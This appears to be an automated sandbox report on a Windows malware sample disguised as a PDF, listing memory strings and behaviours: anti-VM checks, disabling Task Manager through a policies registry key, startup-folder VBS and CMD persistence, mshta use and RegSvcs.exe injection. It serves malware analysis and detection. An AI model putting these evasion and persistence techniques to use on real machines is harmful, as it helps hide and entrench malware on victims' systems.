Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7ca
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtray.exel
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: emulator
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf20f3a14479613e9f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antitask
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\policies\system
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: key3857
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \cu6(\k
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: enxbt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ehgt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $6mhbt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0xm{5m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @b(at
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6q(at
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: htxat
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0x6x5
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0x6d5
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ehbt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mk8et
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: crlf;
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: file ="4
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \0x385*
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +sh2zk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m:xet
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3<xet
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @shft
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $m4(et
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $8xft
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $e(et
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (8het
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0x3 5
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exe_c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disabl
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8het
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 88gt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cd g$b
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0xmk5~
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6(xht
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ta3%.
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a&(ht
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (8xgt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disablt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @echo off
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \mshta.exe<
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variables3
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablesnaryx
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablescd23e39753777_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablesciiarray9767m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \start.cmdd
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \start.cmd720f4bc51747{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f82ff591rosor
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \run.vbs9c720ee97637d6i
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \run.vbsg
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.shell
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startupdir720f4bc51747
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wshshell.run= wscript.
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.quit
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablescd21f2a6447d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_dword
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdirrtnamec59767
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: etaskmgr9fd2df5a1406c4
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte[uctcreate
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bc2b06967
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: etaskmgr
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: const hidden = 01406c4
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start.lnk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start.cmd"720f4bc51747
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd2beaa940707d27a3a0?
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c32bf4bb517f770c.
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc0ceea6516a6b0c]
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247cl
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6j
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc0ceea6516a6b0c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb1cd5876247531994bcce137cbe4f905f4178f006
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c>
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353-
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6\
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ez
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc0ceea6516a6b0ci
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cd23e39753777f38a797eb0855807ea04f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd2beaa940707d27a3a0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247crentversion\polici
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: set wshshell = wscript.createobject(
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cd21f2a6447d600c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: persistence-
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de2ff3a044776437b5a0h
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cd21f2a6447d600cs
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mshta.exests
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variables
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e32beaa77f76770c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f82ff591
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de2ff3a044776437b5a0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd2beaa940707d27a3a0[
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e32beaa77f76770cf
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e32beaa77f76770ca
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9d617
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdirte
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execute_vbs
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de2ff3a044776437b5a0.
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e32beaa77f76770ci
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regsvcs.exest
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: delay
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mutexc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mshta.exese
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cd21f2a6447d600c1
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c717\
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f82ff591g
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execute_vbsb
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _msgbox
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c22ff4bc756a603ab4a0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kernel32.dll
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: k3ysx
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tla&t
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s_start
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @0xct
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @7xdt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @phct
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @m8ct
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @wxct
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00BA3312
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0EBE5 mouse_event, 6_2_00C0EBE5
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C013F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_00C013F2
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006CB1000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerg
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000031BB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ihgsvw.exe Binary or memory string: Shell_TrayWnd
Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000030D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@K
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager\2+
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerk
Source: ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inGetText("Program Manager") = "0" Then
Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager\
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_003EAF0F
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
